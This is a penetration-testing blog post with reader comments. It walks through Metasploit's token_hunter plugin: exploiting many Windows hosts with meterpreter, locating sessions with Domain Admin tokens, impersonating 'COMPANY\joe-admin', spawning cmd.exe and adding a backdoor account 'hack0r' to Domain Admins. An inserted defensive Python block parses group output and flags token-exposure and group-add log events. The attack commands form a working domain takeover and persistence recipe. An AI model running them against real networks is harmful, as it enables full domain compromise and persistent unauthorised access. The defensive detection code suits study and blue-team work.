Hunting for Domain Admin Tokens

Penetration assessments are a focused effort to accomplish one or more goals within a limited timeframe, so it is often helpful to automate tasks to put time on your side. This is where a penetration tester who can code really excels: less time is wasted on mundane tasks. Automation is always key, meaning automating the tasks that should be automated. Clearly there are specific tasks that can't or shouldn't be automated, but that is a topic for another post.

One nice example I have seen during several on-site assessments is the need to find a machine with a Domain Admin's token on it. The token can be impersonated to compromise the network. Finding the token can take hours of manual work. I mentioned this to HD Moore and he added a plugin to Metasploit that automates this process. To use this new functionality, we start by exploiting a ton of Windows boxes using meterpreter as the payload.

Next, we need to build a list of users that are within the Domain Admins group. This list can be generated using:
net groups "Domain Admins" /domain

Example of the file:

We then need to load the token_hunter plugin in Metasploit and run it. The token_hunt_user command will tell us which sessions contain a Domain Admin token.
msf> load token_hunter
msf> token_hunt_user -f /tmp/domain-admin.txt

To achieve Domain Admin privileges, we need to connect to a session that contains a Domain Admin token.
msf> sessions -i [session-with-domain-admin-token]

Once connected to the session, we then impersonate the Domain Admin and spawn cmd.exe with the admin’s privileges.
meterpreter> impersonate_token 'COMPANY\joe-admin'
meterpreter> execute -f cmd.exe -H -c -i -t

Lastly, we add a new account to the domain and add the account into the Domain Admins group.
C:\> net user hack0r h4ck0r /add /domain
C:\> net group "Domain Admins" hack0r /add /domain
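As an added example that is not part of the original post, here is the defender's counterpart to the steps above: it parses the output of `net group "Domain Admins" /domain` into the same admin list the post builds, then scans Security-log events for Domain Admin logons that leave a reusable token on a non-DC host (the situation the token_hunt_user step hunts for) and for any account added to Domain Admins (the post's final step). The hostnames, the DC set, the `net group` output and the event samples are all constructed assumptions.

```python
import json

DOMAIN_CONTROLLERS = {"dc01.company.local"}   # assumed: hosts where DA logons are expected
TOKEN_LEAVING_LOGONS = {2, 4, 5, 10, 11}      # interactive, batch, service, RDP, cached logons

# Constructed output of `net group "Domain Admins" /domain` (not captured from a real domain).
NET_GROUP_OUTPUT = """Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            joe-admin
The command completed successfully.
"""

# Constructed Security-log events, one JSON object per line (field names follow 4624/4728).
SAMPLE_EVENTS = """
{"EventID": 4624, "Computer": "ws-pc01.company.local", "TargetUserName": "joe-admin", "LogonType": 10}
{"EventID": 4624, "Computer": "dc01.company.local", "TargetUserName": "joe-admin", "LogonType": 10}
{"EventID": 4624, "Computer": "ws-pc02.company.local", "TargetUserName": "alice", "LogonType": 2}
{"EventID": 4624, "Computer": "ws-pc03.company.local", "TargetUserName": "joe-admin", "LogonType": 3}
{"EventID": 4728, "Computer": "dc01.company.local", "TargetUserName": "Domain Admins", "MemberName": "CN=hack0r,CN=Users,DC=company,DC=local", "SubjectUserName": "joe-admin"}
"""

def parse_net_group(output):
    """Member names from `net group` output: the block between the dashed rule and the footer."""
    lines = output.splitlines()
    start = next(i for i, l in enumerate(lines) if l.startswith("---")) + 1
    members = set()
    for line in lines[start:]:
        if line.startswith("The command completed"):
            break
        members.update(name.lower() for name in line.split())
    return members

def find_token_exposure(event_lines, admins):
    """Alerts for (a) a DA logon that leaves a reusable token on a non-DC host and
    (b) any account added to Domain Admins (event 4728)."""
    alerts = []
    for line in event_lines.strip().splitlines():
        ev = json.loads(line)
        host = ev["Computer"].lower()
        if (ev["EventID"] == 4624 and ev["TargetUserName"].lower() in admins
                and ev["LogonType"] in TOKEN_LEAVING_LOGONS and host not in DOMAIN_CONTROLLERS):
            alerts.append(("da-token-on-host", host, ev["TargetUserName"]))
        elif ev["EventID"] == 4728 and ev["TargetUserName"] == "Domain Admins":
            alerts.append(("da-group-add", host, ev["MemberName"]))
    return alerts
```

Network logons (type 3) are deliberately ignored, since they do not leave the kind of token the post impersonates; the DC logon is expected and is not alerted on.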

Enjoy it and Pwn dem v0hns!


9 Responses to Hunting for Domain Admin Tokens

  1. Dr.White says:

    Nice =) thanks for tutorial…


  2. Black says:

    Good one there mate! (:

  3. acemutha says:

    Very useful tut, even if nowadays I find it very difficult to exploit Windows machines, as IMO the last useful exploit is 08_067, which in most cases has been patched after the infamous Conficker.

    • Jabra says:

      @acemutha There are plenty of exploits for Windows. Yesterday alone, Metasploit added 2 PDF exploits. You can also use the most reliable exploits like psexec or blank sa.


  4. […] Hunting for Domain Admin Tokens By c0llateral Another one from Joshua’s blog […]

  5. xaocuc says:

    Nice post! You should definitely revise it due to last changes in meterpreter implementation

  6. *** says:

    ok first step net groups “Domain Admins” /domain
    Wouldn't I need to execute this from a box joined to the domain? Do I also have to have domain admin privs to successfully execute it?
